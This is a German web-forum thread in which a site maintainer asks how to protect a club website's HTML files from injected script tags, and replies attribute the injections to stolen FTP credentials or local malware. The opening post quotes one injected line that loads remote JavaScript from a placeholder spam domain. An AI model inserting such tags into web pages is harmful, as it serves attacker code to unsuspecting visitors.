Ankündigung

Einklappen
Keine Ankündigung bisher.

HTML dateien mit .htaccess schützen vor Skripten

Einklappen

Neue Werbung 2019

Einklappen
X
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • HTML dateien mit .htaccess schützen vor Skripten

    Grüßt euch,

    ich habe ein Problem insbesondere mit einer Vereinswebseite, die ich betreue.
    Da läuft kein PHP, wo ich was wie zbblock einsetzen kann ( leider) und auch die .htaccess ist doch bei dem Paket von Strato doch nur in einem begrenzten Umfang nutzbar,- d.h. recht viel nicht einsetzbar an Befehlen.

    Was mich nervt sind diese ewigen Skripte die sich einschreiben, die ihr sichetr kennt und so aussehen:
    Code:
    <!--af9ce8--><script type="text/javascript" src="http://Irgendeine-Mist-Spam-Seite.com/swf.php"></script><!--/af9ce8-->
    Habt ihr eine Idee mit welchen Möglichkeiten in der .htaccess ich die HTML Dateien bestmöglich schützen kann?


  • #2
    Garnicht?! Passwort ändern oder bei Strato melden.
    Zitat von nikosch
    Macht doch alle was Ihr wollt mit Eurem Billigscheiß. Von mir aus sollen alle Eure Server abrauchen.

    Kommentar


    • #3
      Mit .htaccess gar nicht... du musst schon Scriptseitig abfangen, ob du einen POST Request annimmst oder nicht, htaccess kann dir nicht dabei helfen, einen echten Benutzer von einem Spambot zu unterscheiden.

      http://webdesign.weisshart.de/kommentar-spam.php
      (Als Beispiel, welche Überlegungen anzustellen sind, um Spam abzufangen)
      Über 90% aller Gewaltverbrechen passieren innerhalb von 24 Stunden nach dem Konsum von Brot.

      Kommentar


      • #4
        Ich finde soweit ich weiß gibts ja doch den einen oder andere Trick, der sicher nicht das unmöglich macht, der aber einen Kieselstein darstellt.

        Den Länderausschluss via IP Begrenzung ist leider doch lückenhaft gewesen, so dass ich bei einigen Seiten Fehler bekam. Aber das wäre halt so eine Maßnahme, die sicher auch mittels deutschen Proxy zu überwinden wäre, was aber die Sache erschweren würde.

        Kommentar


        • #5
          Was ist das? Gästebuch/Kommentar Spam oder werden die HTML Dateien verändert?

          Kommentar


          • #6
            Nein, ein Gästebuch ist keins drin. Es werden die HTML Dateien geändert.

            Kommentar


            • #7
              Der erste Schritt ist rauszufinden wie die Dateien geändert werden. Bei Webspace ohne PHP und ähnlichen ist das wahrscheinlichst das die Zugangsdaten für den FTP in die falschen Hände geraten sind. Also Zugangsdaten ändern, sauberes Backup einspielen und beobachten. Wenn es wieder passiert Strato informieren...

              Kommentar


              • #8
                Das ist der Grund wieso ein 4 stelliges Passwort nicht genügt.
                [URL="https://gitter.im/php-de/chat?utm_source=share-link&utm_medium=link&utm_campaign=share-link"]PHP.de Gitter.im Chat[/URL] - [URL="https://raindrop.io/user/32178"]Meine öffentlichen Bookmarks[/URL] ← Ich habe dir geholfen ? [B][URL="https://www.amazon.de/gp/wishlist/348FHGUZWTNL0"]Beschenk mich[/URL][/B].

                Kommentar


                • #9
                  Sowas kommt eher von Schadsoftware auf dem eigenen Rechner. Vorheriges Jahr gabs auch eine Filezilla Version die ziemlich gesprächig war.

                  Kommentar

                  Lädt...
                  X